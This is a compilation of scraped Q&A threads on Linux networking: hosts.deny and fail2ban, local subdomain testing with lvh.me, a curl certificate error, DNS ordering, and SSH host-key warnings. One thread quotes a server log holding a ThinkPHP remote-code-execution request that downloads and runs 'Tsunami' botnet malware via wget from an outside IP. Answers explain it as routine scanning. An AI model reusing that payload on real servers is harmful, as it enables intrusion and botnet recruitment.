Why does my IP address keep ending up in hosts.deny file? - linux

At my organisation we've set up a linux server which runs one of our sites. It's been working fine and I have been able to SSH through into it (using Terminal on OSX) no problem.
As of earlier when I tried to ssh root#123.123.123.123 (not my real IP) I was rejected with: ssh_exchange_identification: Connection closed by remote host
Having a look at the /etc/hosts.deny file I can see: sshd: 123.123.123.123 in the list.
This means the IP which I have been using for months no problem has suddenly appeared in the list. I removed it, and was able to SSH in fine, ONCE, then on my second try I was rejected and looking at the list again, I can see we have been added to the list once more!
I have added our IP to the hosts.allow file, but no luck - still no access.
Why do IP's appear in the hosts.deny file?
How can I stop our IP appearing there?

As mentioned, probably a fail2ban or similar (look for denyhosts too - another popular).
The usual fix is to append your IP address to /etc/hosts.allow
This works for denyhosts at least

You may have a system like fail2ban installed which adds you to the hosts.deny file if you enter your password incorrectly a few times..

Related

Python 3 http.server - A strange IP address tried to connect my server

Several minutes ago, I ran a python-based server to share a few files with my friend. I disabled the windows firewall so that he could connect and download the files. When someone tries to connect the server, Python shows their IP address and the path they requested.
Someone whom I don't know tried to get my index.php and run wget. I checked their IP address and it seems like they're from Japan. So, how does this person knew my IP address and tried to connect to my computer? I've only shared it with my friend on WhatsApp.
I've done this many times before and this is the first time something like this happens.
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
There are many people out there running tools like Masscan with custom scripts looking for vulnerable web servers. Most of the time this kind of script are trying to get reverse shells in an attempt to build botnet armies. There are some relates of windows machines connected to internet being hacked before SO finish its installation as well.
This is a pretty common hacking technique. Hackers will scan the internet using seemingly random ip addresses (and happened to pick yours out) and look for open ports (usually common ports like 22, 80 and 443) and run a bunch of common exploits in efforts to gain control over the machine.
Many of the botnet's were created by just attacking random ip addresses hoping that they would have a router with default username and password still set on their router, or with out of date software with known exploits.
In your case it looks like they were hoping that your web server was running a certain combination of PHP software. Your ip address was probably one of thousands that they ran the same query against.
This is why you shouldn't disable your firewall: the average time it takes from going online without protection to someone trying to crack into your system is at best minutes.
Instead, you should find out the IP of your friend, and just allow that single IP. And unless your friend has a static IP address, remove that allow after they're done testing, because someone else could get that address later.

It is safe to use lvh.me instead of localhost for testing?

I wonder whether is safe to use lvh.me instead of localhost when developing locally, since lvh.me must be resolved and the IP may change over time.
The goal of using lvh.me is to be able to handle subdomains, since localhost does not have top level domain.
Unless you are the maintainer of lvh.me, you can not be sure it will not disappear or change its RRs for lvh.me.
You can use localhost.localdomain instead of localhost, by adding the following lines in your hosts file:
127.0.0.1 localhost localhost.localdomain
::1 localhost localhost.localdomain
This is better than using lvh.me because:
you may not always have access to a DNS resolver, when developing
lvm.me does not answer with a local IPv6 address corresponding to your local host, only with the IPv4 address 127.0.0.1
some ISPs DNS resolvers block answers corresponding to private addresses space, for security purpose (to avoid leaking internal informations)
Since you said in a comment that you do not want to update the host file, you have no mean to be sure that lvh.me will always work for your developers. Therefore, to answer your question: it is not safe. You may register a domain for yourself, but as I said before, some resolvers will block answers corresponding to private addresses space.
lvh.me was not resolving to 127.0.0.1 on June 7, 2021. Depending on DNS names you don't control comes with this kind of risk. Although the domain name was reinstated by the end of the day, this answer offers some alternatives to depending on someone else's DNS configurations.
Both Firefox and Google Chrome now treat *.localhost names like localhost. They also do the right thing with port numbers.
To test it yourself, start a local http server listening to port 8000:
python -m http.server 8000
Then try these links
http://example.localhost:8000
http://other.localhost:8000
http://sub.subdomain.localhost:8000
This trick does not help for command line programs. For example, this command will fail to resolve the host:
curl http://example.localhost:8000
Curl itself offers a lot of other tricks that might work for you if you need custom subdomains on the command line. For example, this trick works:
curl --resolve example.localhost:127.0.0.1 \
http://example.localhost:8000
Also worth noting that a similar service is still available.
See https://readme.localtest.me.
One last alternative is to configure your own wildcard CNAME to resolve to 127.0.0.1. For example:
*.my.example.com. 1800 IN CNAME my.example.com.
my.example.com. 1800 IN A 127.0.0.1
No because as of right now http://lvh.me has an expired domain.😬
Services like lvh.me or localtest.me are just DNS services, so the only thing you're publishing to them is the names or the hosts you're using. They could resolve to any IP at any time, but providing you use use them only for local tests with fake data, you'll be safe.
But what if they shut down the service? Again, since you should only use them for local tests, you'll get immediate feedback and can easily go back to using localhost.
Quick fix if you don't want to rewrite your code is to open up hosts file
sudo nano /etc/hosts
paste in (replace yoursubdomain with what subdomain you're calling)
127.0.0.1 yoursubdomain.lvh.me
push ctrl-x
then y
then enter
Then you're good to go
It depends on what you're doing. If it's local development then most the time yes, you can always resolve it if you want to check:
For linux or osx you can run this in terminal:
dig X.nip.io
It should always return 127.0.0.1. So while it's not the "safest" way to do this (because you don't manage the DNS itself), I still use it frequently for some kind of resolving TLD when necessary. Here's some valid reputable sites that are still around:
https://nip.io/
https://sslip.io/
You can just point your browser at myproject.apps.localhost or www.example.net.localhost.

Curl error "no alternative certificate.."

We have a problem in only one of our servers hosted at Amazon (the development server).
The problem happens when doing a curl request to a specific domain, by running this:
> curl https://api.plivo.com
Results in:
curl: (51) SSL: no alternative certificate subject name matches target host name 'api.plivo.com'
I did some research and found out that it might be a problem with the server's certificate, however if I try this from any other server it works fine, same on my local machine.
So I'm thinking that this might be a cache issue from curl? I tried reinstalling it, updating it, but no dice.
I'm almost creating a new dev machine because of this, because it's blocking us from using this service.
To summarize from the comments:
The good and the bad system actually accessed different servers which were configured with different certificates. That's why it failed on one system but not on the other.
The reason for this difference was that the bad system had an entry in /etc/hosts which was used instead of asking the DNS server.
The problem was found by comparing the output of curl -v and realizing that the shown target IP address was different.
The problem was fixed by removing the old entry in /etc/hosts so that it now queries the DNS server and gets the correct IP address of the server.

Query DNS in Ubuntu

I use two DNS servers a public one (8.8.8.8)
and a local one (192.168.1.20)
In ubuntu, If I wrote both DNSs 192.168.1.20, 8.8.8.8
it will always query the first and until the first is down and then it will start querying the second.
And of course I have to make the local point again to 8.8.8.8
Like this i have almost no problems, I can resolve local addresses and also public ones
but when I'm out of the office that's were all the problems start.
Having the local DNS first makes ubuntu checks for it every single time it needs to resolve.
So I end up switching switching the priority of the DNS every (8.8.8.8, 192.168.1.20) time I change my location.
This is not the case if I was using windows. It somehow sends to both DNSs at once or something of that sort.
Is there a way to avoid changing the DNS for every location?
Ubuntu also must query each server in /etc/resolv.conf if there is no answer from the first server.
Give an output of 'dig google.com' please
You wrote 'until the first is down'...
The system of course will connect other servers ONLY if has no respond from the first one!!
The servers are listed in preferable order
Not an answer but a possible work around.
Are you able to use different network interfaces for each network?
If so you can specify different "dns-nameservers" in the "/etc/network/interfaces" file.

SSH login warning message on a server with 2 DNS names

I am doing ssh to server x1.example.com from a laptop sometimes from outside and sometimes from lan. From lan I just say
ssh karl#x1
and from wan:
ssh karl#x1.example.com
But from lan I get always a warning: remote host identification has changed.
I can delete the other key in the known_hosts file each time, but I was wondering if there is a better solution.
I am hesitating to turn the key verification off, because this would be less secure. But getting a warning all the time is also unsecure (because I ignore such warnings all the time then)
In known_hosts file you can list several names and even IP's for one key, for example:
x1,x1wan.example.com,192.168.0.134,23.41.51.23 ssh-rsa AAAA/bunch/of/gibberish/looking/data/==
But it is not your problem here. If you have a warning that host identification has changed it really means that. It means that between a moment of your first connection to this host from lan and now, somebody regenerated a host key for this host, for example while reinstalling the OS. Or that you have a man-in-the-middle attack.
Confirm with your admin that a host was reinstalled and host key regenerated and then remove old key from your known_hosts file. Next time you connect you'll add a new, correct key to known_hosts file and this warning will go away.
I think it is actually one name, technically.
Assign a second host name (maybe via your hosts file) to access your server from the WAN: E.g.:
ssh karl#x1wan.example.com
I access a server via ssh with two different names (same IP) with no warnings. E.g.: name1.example.com and name2.example.com
Thank you very much for your answers.
Sorry folks, I lost my cookie based login and cannot rate or edit anymore. Your questions helped me to get around the problem when I change from LAN to WAN. I regard this question as solved.
But now I see the problem goes even deeper because I also have 2 hosts on the same IP, and the IP also changes, which I am covering (from my new account which I cannot loose anymore) in a new question with more details:
How to handle ssh host key verification with 2 different hosts on the same (but changing) IP address?

Resources